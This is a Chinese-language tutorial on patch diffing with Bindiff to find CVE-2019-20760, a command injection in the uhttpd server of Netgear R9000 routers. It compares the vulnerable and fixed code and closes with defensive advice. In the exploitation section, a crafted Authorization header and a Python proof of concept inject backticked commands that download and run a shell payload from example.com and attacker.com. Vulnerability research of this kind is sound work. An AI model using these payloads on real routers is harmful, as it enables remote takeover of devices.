从补丁对比看漏洞原理:手把手教你用Bindiff分析Netgear uhttpd的RCE漏洞(CVE-2019-20760)
从补丁对比看漏洞原理:手把手教你用Bindiff分析Netgear uhttpd的RCE漏洞(CVE-2019-20760)
在二进制安全领域,补丁对比(Patch Diffing)是一种高效定位漏洞的技术手段。当厂商发布安全更新时,通过对比修复前后的二进制文件,我们可以快速锁定被修改的关键函数,进而分析漏洞成因。本文将以Netgear R9000路由器中的uhttpd服务为例,带你深入理解如何利用Bindiff工具挖掘CVE-2019-20760这个经典的远程命令执行漏洞。
1. 环境搭建与工具准备
1.1 获取目标固件
首先需要下载存在漏洞和已修复的两个版本固件:
- 漏洞版本:R9000-V1.0.4.26
- 修复版本:R9000-V1.0.4.28
wget https://www.downloads.netgear.com/files/GDC/R9000/R9000-V1.0.4.26.zip wget https://www.downloads.netgear.com/files/GDC/R9000/R9000-V1.0.4.28.zip1.2 解压固件提取关键文件
使用binwalk解压固件获取文件系统:
binwalk -Mer R9000-V1.0.4.26.img binwalk -Mer R9000-V1.0.4.28.img重点关注/usr/sbin/uhttpd这个二进制文件,它是漏洞分析的核心目标。
1.3 工具链配置
本次分析需要以下工具:
- IDA Pro:用于反汇编和静态分析
- Bindiff:IDA插件,专门用于二进制文件差异比较
- QEMU:ARM架构模拟环境(可选,用于动态调试)
提示:确保Bindiff插件已正确安装到IDA的plugins目录,并在分析时选择相同版本的IDA加载两个文件以保证对比准确性。
2. Bindiff基础操作与函数匹配
2.1 加载二进制文件
- 用IDA分别打开漏洞版本和修复版本的uhttpd
- 等待初始分析完成后,通过
File > Load file > Bindiff database加载对比文件 - Bindiff会自动匹配两个版本中的相似函数
2.2 理解匹配结果
Bindiff会显示函数相似度评分(0-1.0),重点关注:
| 相似度范围 | 分析建议 |
|---|---|
| 0.9-1.0 | 几乎无变化 |
| 0.7-0.9 | 微小调整 |
| 0.3-0.7 | 显著修改 |
| <0.3 | 可能重构 |
在本次案例中,uh_cgi_auth_check函数显示相似度0.65,表明有重要修改。
3. 漏洞函数深度分析
3.1 漏洞版本代码还原
通过反编译漏洞版本的uh_cgi_auth_check,关键代码如下:
memset(s, 0, 0x1000u); v14 = strlen(v13); uh_b64decode(s, 0xFFF, v13 + 6, v14 - 6); v15 = strchr(s, ':'); if (!v15) goto LABEL_32; // 构造命令字符串 snprintf(command, 0x80u, "/usr/sbin/hash-data -e %s >/tmp/hash_result", v15 + 1); // 直接执行用户可控输入 system(command);这段代码存在典型命令注入漏洞:
- 对HTTP Basic Auth的Base64解码后获取用户名密码
- 使用
snprintf拼接用户输入的密码部分到系统命令 - 直接通过
system()执行拼接后的命令
3.2 修复版本对比分析
修复后的版本主要变化:
// 使用安全函数替代system dni_system("/tmp/hash_result", 0, 0, "/usr/sbin/hash-data", "-e", v17, 0);关键改进点:
- 用
dni_system替代危险的system调用 - 参数化执行而非字符串拼接
- 固定命令路径,用户输入仅作为参数传递
3.3 漏洞利用原理
攻击者可以构造特殊的Authorization头:
Authorization: Basic YWRtaW46YHdnZXQgZXhhbXBsZS5jb20vc2hlbGwuc2gKY2htb2QgK3ggLi9zaGVsbC5zaAouL3NoZWxsLnNoYA==解码后实际命令:
admin:`wget example.com/shell.sh chmod +x ./shell.sh ./shell.sh`当这个输入被拼接到system()调用时,反引号内的命令将被执行。
4. 漏洞复现与防御方案
4.1 本地验证环境搭建
使用QEMU模拟ARM环境:
qemu-system-arm -M vexpress-a9 \ -kernel vmlinuz-3.2.0-4-vexpress \ -initrd initrd.img-3.2.0-4-vexpress \ -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 \ -append "root=/dev/mmcblk0p2 console=ttyAMA0" \ -net nic -net tap,ifname=tap0,script=no,downscript=no \ -nographic4.2 漏洞验证POC
import requests import base64 cmd = 'admin:`wget http://attacker.com/shell.elf -O /tmp/shell && chmod +x /tmp/shell && /tmp/shell`' auth = 'Basic ' + base64.b64encode(cmd.encode()).decode() requests.get("http://target/cgi-bin/", headers={"Authorization": auth})4.3 安全防护建议
对于开发者:
- 避免使用
system/popen等危险函数 - 使用
execve等参数化执行方式 - 对用户输入进行严格过滤
对于管理员:
- 及时更新设备固件
- 限制管理界面访问来源
- 监控异常网络请求
5. 进阶分析技巧
5.1 函数调用图对比
使用Bindiff的调用图(Call Graph)功能,可以可视化函数关系变化:
- 右键函数选择"View flow graph"
- 对比两个版本的调用关系
- 重点关注新增/删除的安全检查函数
5.2 交叉引用分析
在IDA中通过Xrefs查找system等危险函数的调用点:
for addr in idautils.Functions(): if "system" in GetFunctionName(addr): print(hex(addr), GetFunctionName(addr))5.3 补丁星期二分析策略
针对厂商定期更新的安全补丁,建议:
- 建立自动化抓取固件更新的流程
- 对每个版本进行Bindiff快速筛查
- 优先分析网络服务组件
- 记录历史漏洞模式形成知识库
在真实漏洞挖掘过程中,补丁对比往往能发现"漏洞的同源变异"。比如这次分析的命令注入问题,在多个厂商的路由器固件中都存在类似模式。掌握Bindiff这类工具的使用,能显著提高二进制分析的效率。